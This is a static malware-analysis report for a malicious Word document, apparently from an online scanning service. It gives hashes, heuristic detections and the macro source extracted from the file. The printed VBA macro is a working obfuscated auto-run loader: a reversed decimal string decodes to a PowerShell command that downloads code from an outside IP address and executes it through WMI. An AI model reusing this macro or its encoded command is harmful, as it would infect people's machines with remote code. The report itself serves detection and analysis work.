Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6fbf97ccf59de2ec…

MALICIOUS

Office (OOXML)

22.3 KB Created: 2021-09-28 08:25:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-10-01
MD5: 0750cdec3fbe808ebc2803130d173b50 SHA-1: a1c4c51c7450891cb84cbf0dfbe713c4ff604aae SHA-256: 6fbf97ccf59de2eccd256f25bc506ecb9000749a05d7db022e83743a6e7f2a8a
244 Risk Score

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2328 bytes
SHA-256: 3efb9d70b4e91545f9f7e5998cc089c78fb0f1beeea17f01e4e8bd38df1996e7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function ToDec(myString, incrementBy)
    Dim Counter As Integer
    Dim output As String
    For Counter = 1 To Len(myString)
        MyDecimal = Asc(Mid(myString, Counter, 1))
        output = output & " " & MyDecimal
         
    Next
     
    ToDec = output
End Function
 
Function DecToLetter(str As Variant) As String
    Dim tmp As Integer
     
    Length = Len(str)
    For i = 1 To Length
        CH = Mid(str, i, 1)
        If CH Like "[0-9]" Then
            tmp = tmp & CInt(CH)
        End If
    Next i
    DecToLetter = CStr(Chr(tmp))
 
End Function
 
     
Function sSplit(myString, decrementBy)
    Dim output As String
    Dim arr() As String
     
    arr = Split(myString, " ")
       
    Dim letter As Variant
     
    For Each letter In arr
        output = output & DecToLetter(letter)
    Next
     
    sSplit = output
 
End Function

Function random_eggs(eggs)
random_eggs = StrReverse(eggs)
End Function


Private Sub Test()
Dim myString
Dim decstring
decstring = "41 41 41 41 39 116 120 116 46 108 108 101 104 115 114 101 119 111 112 47 51 52 52 58 48 46 51 51 46 56 53 49 46 48 56 47 47 58 112 116 116 104 39 40 103 110 105 114 116 115 100 97 111 108 110 119 111 100 46 41 116 110 101 105 108 99 98 101 119 46 116 101 110 46 109 101 116 115 121 115 32 116 99 101 106 98 111 45 119 101 110 40 40 103 110 105 114 116 83 52 54 101 115 97 66 109 111 114 70 58 58 93 116 114 101 118 110 111 67 46 109 101 116 115 121 83 91 40 103 110 105 114 116 83 116 101 71 46 101 100 111 99 105 110 85 58 58 93 103 110 105 100 111 99 110 69 46 116 120 101 84 46 109 101 116 115 121 83 91 40 120 101 105 32 99 45 32 112 111 110 45 32 115 115 97 112 121 98 32 99 101 120 101 45 32 108 108 101 104 115 114 101 119 111 112"
 

    original = sSplit(decstring, 10)
    
GetObject(random_eggs(":stmgmniw")).Get(random_eggs("ssecorP_23niW")).Create random_eggs(original), Null, Null, pid


End Sub


Sub Document_Open()
Test
End Sub

Sub AutoOpen()
Test
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 25600 bytes
SHA-256: 0690aa68e7fb55d2963172092840b8affd0b7162a10fb1836fba5ddaa7d502b0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.